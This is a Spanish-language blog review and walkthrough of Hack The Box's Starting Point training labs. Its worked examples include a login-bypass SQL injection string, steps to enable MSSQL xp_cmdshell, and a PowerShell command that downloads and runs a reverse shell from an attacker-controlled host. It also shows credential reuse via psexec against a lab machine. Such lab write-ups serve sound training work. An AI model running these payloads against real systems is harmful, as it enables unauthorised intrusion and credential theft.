En resumen: HTB Starting Point es la mejor rampa de entrada estructurada al hacking práctico que existe ahora mismo. Gratuita, amigable para principiantes, y conectada al ecosistema real de HTB — es donde deberías comenzar antes de tocar cualquier otra cosa en la plataforma.
¿Qué es HTB Starting Point?
Hack The Box es conocido por ser notoriamente difícil. Las máquinas salen en vivo, la comunidad corre a rootearlas, y los principiantes a menudo se sienten perdidos mirando una configuración VPN y un escaneo nmap vacío, preguntándose qué están haciendo mal.
Starting Point soluciona eso.
Es una sección estructurada y guiada de HTB diseñada específicamente para recién llegados. Obtienes:
- Una secuencia de máquinas organizadas en tiers de dificultad creciente
- Writeups oficiales para cada máquina (disponibles de inmediato — sin esperas)
- Preguntas guiadas que te llevan paso a paso por la cadena de ataque
- Una conexión VPN a una red dedicada y aislada
Piénsalo como la respuesta de HTB a “quiero practicar pero no sé por dónde empezar.” Funciona.
Cómo está organizado Starting Point
Starting Point está dividido en tres tiers:
Tier 0 — Los fundamentos absolutos
Tier 0 es sobre fundamentos. Estas máquinas no son realmente vulnerables en el sentido tradicional — te están enseñando cómo usar las herramientas. Cubrirás:
- Meow — Telnet, acceso no autenticado, enumeración básica
- Fawn — FTP, login anónimo, recuperación de archivos
- Dancing — Enumeración SMB con
smbclient - Redeemer — Redis,
redis-cli, acceso no autenticado a datos - Explosion — RDP con
xfreerdp, sin credenciales requeridas - Preignition — Brute-force de directorios web con
gobuster - Mongod — MongoDB, acceso shell no autenticado
- Synced — Rsync, servicio de sincronización de archivos desprotegido
Ninguna de estas te enseñará explotación en el sentido clásico. Te enseñarán a enumerar, conectar e interactuar con servicios. Esa es la base sobre la que se construye todo lo demás.
Tier 1 — Acceso inicial
Las máquinas de Tier 1 requieren que encuentres y explotes una vulnerabilidad para obtener un foothold. Sin post-explotación aún — solo entrar. Las máquinas incluyen:
- Appointment — SQL injection contra un formulario de login
- Sequel — MySQL, reutilización de credenciales, consultas SQL manuales
- Crocodile — Credenciales FTP + panel de login web
- Responder — LLMNR poisoning con Responder, capturando hashes NTLMv2
- Three — Mala configuración de bucket AWS S3, enumeración de subdominios
- Ignition — Credenciales por defecto en un panel de administración web (Magento)
- Bike — Server-Side Template Injection (SSTI) en Node.js
- Funnel — SSH port forwarding, PostgreSQL
- Pennyworth — Jenkins Groovy script console RCE
- Tactics — PsExec, autenticación SMB, escalada de privilegios en Windows
Tier 2 — De foothold a root
Tier 2 es donde empieza a sentirse como pentesting real. Estás encadenando vulnerabilidades — acceso inicial, escalada de privilegios, a veces movimiento lateral. Máquinas clave:
- Archetype — MSSQL xp_cmdshell, WinRM, Windows privesc vía historial de PowerShell
- Oopsie — IDOR, subida de archivos PHP, abuso de binario SUID en Linux
- Vaccine — FTP, SQL injection, sudo GTFOBin para root
- Unified — Log4Shell (CVE-2021-44228), manipulación de MongoDB, explotación de UniFi Network
- Included — LFI + TFTP, escape de contenedor LXD
- Markup — XXE, clave SSH en código fuente, privesc vía tarea programada de Windows
- Base — PHP type juggling, exploit de copia de archivo con sudo
Empezando: La configuración
Paso 1: Crea una cuenta gratuita
Ve a hackthebox.com y regístrate. Las cuentas gratuitas tienen acceso a todo Starting Point — no necesitas suscripción VIP para nada de esto.
Paso 2: Descarga tu configuración VPN
Navega a Starting Point en la barra lateral, luego ve a Connection y descarga el archivo .ovpn para Starting Point (es separado de la VPN principal de HTB).
sudo openvpn starting_point_YourUsername.ovpn
Espera a Initialization Sequence Completed. Luego en una terminal separada:
ping 10.129.X.X # Usa la IP de la máquina desde la interfaz de HTB
Si responde, estás conectado.
Paso 3: Inicia una máquina
Haz clic en Starting Point → selecciona Tier 0 → elige Meow → haz clic en Spawn Machine. HTB asigna una VM y te da una IP. Tienes 24 horas antes de que se desproporcione automáticamente (siempre puedes re-proporcionar).
Trabajando en Tier 0: Ejemplo de walkthrough
Vamos a recorrer Meow — la primera máquina — como ejemplo concreto del flujo de trabajo.
Meow — Acceso por Telnet
Objetivo: 10.129.X.X (la IP que HTB asigne)
Paso 1: Ping al objetivo
ping -c 3 10.129.X.X
Confirma que la máquina está activa.
Paso 2: Escanear puertos abiertos
nmap -sV 10.129.X.X
Verás que el puerto 23 (Telnet) está abierto.
Paso 3: Conectar vía Telnet
telnet 10.129.X.X
Te pedirá login. Prueba root sin contraseña. Funciona. Estás dentro.
Paso 4: Encontrar la flag
ls
cat flag.txt
Envía la flag en la interfaz de HTB. Máquina completa.
Ese es el ciclo de Tier 0: enumerar → conectar → obtener flag. Simple por diseño. El punto es aprender las herramientas, no los puzzles.
Trabajando en Tier 1: Ejemplo de walkthrough
Appointment — SQL Injection
Paso 1: Escaneo nmap
nmap -sC -sV 10.129.X.X
El puerto 80 está abierto. HTTP.
Paso 2: Explorar el sitio Encuentras un formulario de login. Configuración clásica.
Paso 3: Probar SQL injection En el campo de usuario, prueba:
admin'--
Con cualquier contraseña. Esto comenta la verificación de contraseña en la consulta SQL.
Paso 4: El login funciona Estás dentro. La flag está en el dashboard.
La lección: nunca confíes en la entrada del usuario. La consulta SQL de login se ve algo así:
SELECT * FROM users WHERE username='INPUT' AND password='INPUT'
Tu inyección la convierte en:
SELECT * FROM users WHERE username='admin'--' AND password='anything'
Todo lo que viene después de -- queda comentado. Autenticación bypasseada.
Trabajando en Tier 2: Ejemplo de walkthrough
Archetype — La cadena completa
Esta es la máquina más instructiva de Starting Point. Te enseña la cadena de ataque completa en Windows que aparece constantemente en engagements reales.
Paso 1: Enumerar
nmap -sC -sV -p- 10.129.X.X
Verás: SMB (445), MSSQL (1433), WinRM (5985).
Paso 2: Enumeración SMB
smbclient -N -L \\\\10.129.X.X
smbclient -N \\\\10.129.X.X\\backups
get prod.dtsConfig
El archivo de configuración contiene credenciales MSSQL en texto plano: sql_svc / M3g4c0rp123.
Paso 3: Shell MSSQL
python3 mssqlclient.py ARCHETYPE/sql_svc:[email protected] -windows-auth
Usando mssqlclient.py de Impacket.
Paso 4: Habilitar xp_cmdshell
EXEC sp_configure 'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure 'xp_cmdshell', 1;
RECONFIGURE;
Paso 5: Obtener un reverse shell Aloja un script PowerShell malicioso vía el servidor HTTP de Python, ejecútalo vía xp_cmdshell, captura el shell con netcat.
xp_cmdshell "powershell -c IEX(New-Object Net.WebClient).DownloadString('http://YOUR_IP/shell.ps1')"
Paso 6: Encontrar el archivo de historial de PowerShell
type C:\Users\sql_svc\AppData\Roaming\Microsoft\Windows\PowerShell\PSReadLine\ConsoleHost_history.txt
Contiene: net.exe use T: \\Archetype\backups /user:administrator MEGACORP_4dm1n!!
Paso 7: Escalar a Administrator
python3 psexec.py administrator:MEGACORP_4dm1n\!\!@10.129.X.X
La flag de root está en C:\Users\Administrator\Desktop\root.txt.
Esa es la cadena: credenciales SMB → MSSQL → xp_cmdshell → RCE → reutilización de credenciales → compromiso total. Este patrón exacto aparece en entornos reales de Active Directory.
Consejos que realmente ayudan
Usa los writeups oficiales estratégicamente. Están ahí. No te sientas mal por usarlos — pero intenta leerlos después de haber intentado la máquina, no antes. La lucha es donde ocurre el aprendizaje.
Toma notas mientras avanzas. Las máquinas de Starting Point están diseñadas para enseñar técnicas transferibles. Documenta cada comando que ejecutes y por qué. Tus notas de Archetype te ayudarán en engagements reales.
No te saltes Tier 0 aunque parezca demasiado fácil. Las herramientas que usas ahí — nmap, smbclient, redis-cli, xfreerdp — aparecen constantemente. Conocerlas de memoria importa.
Configura tu máquina de ataque correctamente. Kali Linux o Parrot OS en una VM. Asegúrate de que Impacket esté instalado:
pip3 install impacket
Y que tengas las herramientas comunes listas: nmap, gobuster, netcat, python3, curl.
Usa -sC -sV en nmap por defecto. -sC ejecuta scripts por defecto, -sV obtiene versiones de servicios. Juntos capturan la mayoría de cosas que un escaneo básico de puertos pierde.
¿Qué viene después de Starting Point?
Una vez que hayas terminado los tres tiers, estás listo para la plataforma principal de HTB. Próximos pasos recomendados:
- Máquinas activas (tier Easy) — Cajas actuales, máquinas Easy retiradas con writeups de la comunidad disponibles después de resolverlas
- HTB Academy — Módulos de aprendizaje estructurado que se combinan con la práctica en máquinas
- Pro Labs (Offshore, RastaLabs) — Entornos completos de Active Directory que simulan redes corporativas — aquí es donde las habilidades de Starting Point se ponen a prueba a escala
Si apuntas a OSCP, las máquinas de Tier 2 de Starting Point son un buen calentamiento. Las máquinas de Windows en particular reflejan el entorno del examen: enumeración de servicios, búsqueda de credenciales, escalada de privilegios vía malas configuraciones.
Errores comunes (y cómo evitarlos)
VPN incorrecta. Starting Point usa una configuración VPN separada de la plataforma principal de HTB. Si estás conectado a la VPN principal, no alcanzarás las máquinas de Starting Point. Descarga el .ovpn correcto desde la página de Starting Point.
Saltarse la enumeración. Cada máquina en Starting Point es resoluble con una enumeración exhaustiva. Si estás atascado, ejecuta un escaneo completo de puertos (-p-), verifica banners de servicios, y enumera cada servicio que encuentres antes de asumir que necesitas explotar algo exótico.
Ignorar las preguntas guiadas. HTB proporciona preguntas de tarea para cada máquina que insinúan el camino de ataque sin revelarlo. Léelas. Están estructuradas para guiar tu pensamiento sin arruinar la solución.
Usar herramientas desactualizadas. Algunos writeups que encuentres en línea son de 2020-2022. Los comandos cambian, los flags de herramientas cambian. En caso de duda, revisa --help o el man page para la versión que estás ejecutando.
Evaluación final
HTB Starting Point está genuinamente bien diseñado. Respeta tu tiempo, enseña técnicas reales, y se conecta directamente al ecosistema más amplio de HTB para que tu progreso signifique algo. La estructura de tres tiers es inteligente — construyes fluidez con las herramientas en Tier 0, habilidades de acceso inicial en Tier 1, y pensamiento de kill chain completo en Tier 2.
Si eres nuevo en pentesting y te preguntas dónde empezar a practicar: aquí. No en salas de TryHackMe, no en tutoriales de YouTube, no en teoría. Levanta Meow, conecta tu VPN, y ejecuta tu primer escaneo nmap. Por ahí se empieza.
Ryuk escribe desde 14+ años en seguridad ofensiva. El contenido es revisado por practicantes y puede ser asistido por IA. Asociación de afiliados con HTB pendiente — los enlaces no están afiliados.
